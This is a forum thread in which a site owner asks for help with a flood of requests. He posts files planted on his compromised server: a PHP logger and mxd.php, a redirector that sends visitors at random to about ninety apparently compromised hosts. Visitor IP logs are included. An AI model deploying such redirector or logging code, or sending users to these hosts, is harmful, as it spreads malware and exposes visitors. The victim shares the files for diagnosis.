Results 1 to 3 of 3
  1. #1
    Join Date
    Apr 2008
    Location
    San Telmo, Buenos Aires
    Posts
    12

    Strange http query attack

    Hello, I have a problem since yesterday in one of my servers, Im receiving between 200 and 300 hits by second from different IPs to a non existent path in a site, the hits are going to different cracks, films and download query's, this site is a directory and its not a warez or p2p site.

    The site is onemilliondirectory.com, and I have suspended it because it was using a lot of resources of the first server, now its being redirected to other location, I have placed some traffic trackers to determine the referer or any other usefull info about the visitors, but the referer is always empty and I think that they are fake users because the statcounter tracker do not recognize the visits.

    For example, some of the hits are:
    Code:
    GET /suspended.page/?v=ABC%204%20KIDS%20Workshop%201.0.zip HTTP
    GET /suspended.page/?v=DecryptSQL%202.8.zip HTTP/1.1
    GET /suspended.page/?v=[0]%20Msn%20Live%20Messenger%20Mobile.zip
    GET /inactive.html?v=Able%20Photo%20Slide%20Show%202.2.5.5.zip
    GET /suspended.page/?v=English%20Grammar%20Worksheet%201.4.zip
    GET /inactive.html?v=Karaoke%205%2030.zip HTTP/1.1
    GET /suspended.page/?v=Nero%208%208.3.2.1.zip HTTP/1.1
    Detail of one of the visits from the cpanel latest visitors tool:
    Code:
    Host: 82.246.88.241
    /inactive.html?a=Knowing.2009.TS.FRENCH.XVID-PaGlop.****.[emule-island.com].avi
    	Http Code: 200 	Date: Apr 07 16:39:54 	Http Version: HTTP/1.1 	Size in Bytes: 262
    	Referer: -
    	Agent: Internet Explorer
    Someone knows what could be happening and how to stop it? Someone had a similar experience?

    PD:I was checking the stats of the site and I have seen as a referer of one of the visits this url: blackhatbootcamp.com /affiliates.html, Im not sure if it has any relation with the problem.

    Thanks in advance
    Daniel

  2. #2
    Hi,

    Use the below command to find any IP making huge no of http connections to your server.

    netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

    If you want to block it automatically, you may install ddos_deflate

    http://deflate.medialayer.com/

    Regards,
    we3cares tech

  3. #3
    Join Date
    Apr 2008
    Location
    San Telmo, Buenos Aires
    Posts
    12
    Hi, Thanks for your reply. I have used the command but there are no IPs using a huge number of connections, the most are using 1 or 2 connections.

    I have checked the folder structure of the site, and I have found that there are a new folder created called "1", and files with the names "logi.php", "log2.php", "ffs2.php", "4556.txt", "file_names.txt", "mxd.php", "down_log.txt", "emlog.txt", "f6fs.txt" and "servernames2.php".

    The most of the files are empty, the file "file_names.txt" has a list of more than 11.000 records like:
    Code:
    Kana Clip 1.1.2.10.czip
    ProStat 4.11.czip
    Stellar Phoenix Solaris-Sparc 1.0.czip
    YupooStream 1.0.10.czip
    erb - Empty Recycle Bin 1.6.2.czip
    The file f6fs.txt:
    Code:
    <?
     if (isset($_GET["a"]))
     {
      $fp = fopen("down_log.txt", "a");
    
      if ($fp)
      {
       fwrite($fp, $_SERVER['REMOTE_ADDR']." | ".$_GET["a"]."\n");
       fclose($fp);
      }
     }
    
    ?>
    and mxd.php:
    Code:
    <?php 
    
    
    
    // сюда вбиваются все линки, на один из них случайно производится переадресация
    
    
    
    $hosts = array("http://ad.diapositivas.com/mxd.jpg",
    "http://ad.videoenlaces.com/mxd.jpg",
    "http://addressdev.com/mxd.jpg",
    "http://adndiario.com.ar/mxd.jpg",
    "http://affairedunet.com/mxd.jpg",
    "http://aisanti.com/mxd.jpg",
    "http://aislesofgreen.com/mxd.jpg",
    "http://ajholweg.nl/mxd.jpg",
    "http://anpopobbs.com/mxd.jpg",
    "http://anunciosgo.com.br/mxd.jpg",
    "http://artesecia.com/mxd.jpg",
    "http://azehntner.ch/mxd.jpg",
    "http://bardomineiro.com.br/mxd.jpg",
    "http://borkum.rotary1850.org/mxd.jpg",
    "http://carmendardalla.com/mxd.jpg",
    "http://cartavalurbana.com/mxd.jpg",
    "http://cefaleaemicrania.it/mxd.jpg",
    "http://centrojuma.es/mxd.jpg",
    "http://ciafer.com.br/mxd.jpg",
    "http://cifras.be/mxd.jpg",
    "http://clubtaurinoperalta.com/mxd.jpg",
    "http://coachrunning.be/mxd.jpg",
    "http://contactoangelico.com/mxd.jpg",
    "http://dedidm.agoride.com/mxd.jpg",
    "http://delcarnes.com.br/mxd.jpg",
    "http://dts-developpement.fr/mxd.jpg",
    "http://dunas.com.br/mxd.jpg",
    "http://electrovision-lacasa.com/mxd.jpg",
    "http://ellipseimage.com/mxd.jpg",
    "http://entdeveze.com/mxd.jpg",
    "http://equipoloemi.com/mxd.jpg",
    "http://faracemichele.com/mxd.jpg",
    "http://fengshuiar.com/mxd.jpg",
    "http://fotografiaspastor.com.br/mxd.jpg",
    "http://francobonaventura.net/mxd.jpg",
    "http://freshontime.ro/mxd.jpg",
    "http://gabrielasouto.com.br/mxd.jpg",
    "http://gcisl.com/mxd.jpg",
    "http://harmsen-degroot.nl/mxd.jpg",
    "http://hotelarbus.it/mxd.jpg",
    "http://hotelcapri.com.br/mxd.jpg",
    "http://jsahagung.110mb.com/mxd.jpg",
    "http://keystonesupplements.com/mxd.jpg",
    "http://kunstfoto-engel.com/mxd.jpg",
    
    "http://madurasputas.webspacemania.com/mxd.jpg",
    
    "http://maik.fgru.de/mxd.jpg",
    
    "http://masterbkr.com.br/mxd.jpg",
    
    "http://mespremierespartitions.fr/mxd.jpg",
    "http://myhomestore.biz/mxd.jpg",
    "http://paintballgalicia.com/mxd.jpg",
    "http://peartreevideo.com/mxd.jpg",
    "http://porntopia.oxyhost.com/mxd.jpg",
    "http://puchuni.com/mxd.jpg",
    "http://putitas.uni.cc/mxd.jpg",
    "http://quiromasajista.net/mxd.jpg",
    "http://rapidlabs.de/mxd.jpg",
    "http://ravestsoft.cl/mxd.jpg",
    "http://residencelucienpaye.fr/mxd.jpg",
    "http://s196859181.online.de/mxd.jpg",
    "http://s92091163.onlinehome.us/mxd.jpg",
    "http://shiatsu-mingmen.com/mxd.jpg",
    "http://songinnight.nayana.com/mxd.jpg",
    "http://soulens.com/mxd.jpg",
    "http://suoninversi.com/mxd.jpg",
    "http://tabuladas.com/mxd.jpg",
    "http://telefuglehund.org/mxd.jpg",
    "http://tinytelly.co.kr/mxd.jpg",
    "http://tsua.net/mxd.jpg",
    "http://villageostia.com/mxd.jpg",
    "http://vinabric.si/mxd.jpg",
    "http://web798.webbox180.server-home.org/mxd.jpg",
    "http://wtal-city.de/mxd.jpg",
    "http://www.aecisrl.com/mxd.jpg",
    "http://www.agriturismoilmandorlo.it/mxd.jpg",
    "http://www.aozora.co.kr/mxd.jpg",
    "http://www.appliteam.com/mxd.jpg",
    "http://www.bookmat.com/mxd.jpg",
    "http://www.bricomatica.net/mxd.jpg",
    "http://www.camel-schmuck.com/mxd.jpg",
    "http://www.dentalclubmercedescova.com/mxd.jpg",
    "http://www.harpadedavi.com/mxd.jpg",
    "http://www.joyhotels.com.br/mxd.jpg",
    "http://www.ktg.hg.pl/mxd.jpg",
    "http://www.nancycroes.com/mxd.jpg",
    "http://www.strcolatina.com.br/mxd.jpg",
    "http://www.superfrozentuna.eu/mxd.jpg",
    "http://yachtpoint.at/mxd.jpg",
    "http://yorukconstruction.com/mxd.jpg",
    "http://zenessens.fr/mxd.jpg");
    
    header("Location: ".$hosts[rand(0, sizeof($hosts)-1)]); 
    
    ?>
    downlog.txt a list of 80k records like:
    Code:
    89.159.243.18 | Fantasy.All.Stars.3.XXX.DVDRip.MPEG1.CD2.mpg
    83.194.212.246 | American.Girls.French.Dvdrip.Divx.par.[emule-island.com].avi
    89.159.243.18 | [Wii]Mario_Kart[PAL][ISO-Full].rar
    83.194.212.246 | American.Girls.French.Dvdrip.Divx.par.[emule-island.com].avi
    201.86.66.44 | Steinberg.Cubase.SX.v3.0.2.623-H2O.rar
    4556.txt:
    Code:
    121.134.40.68:4661
    
    83.233.165.234:4819
    
    83.233.30.103:4500
    
    72.172.89.125:4661
    
    89.248.172.54:4500
    I have searched in the net for any info about this, and I have found that there is a trojan called TROJ_BAGLE with the same folder structure, but its compatible with Win32 and not unix. http://threatinfo.trendmicro.com/vin...GLE.MV&VSect=T

    I have deleted this files in the old server, changed the DNS records of the site and create it again in a new server, but if I active it, the server just collapse, in a few seconds the CPU use is 100% and the unique way to fix it is restart and suspend the site again.

    Thanks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •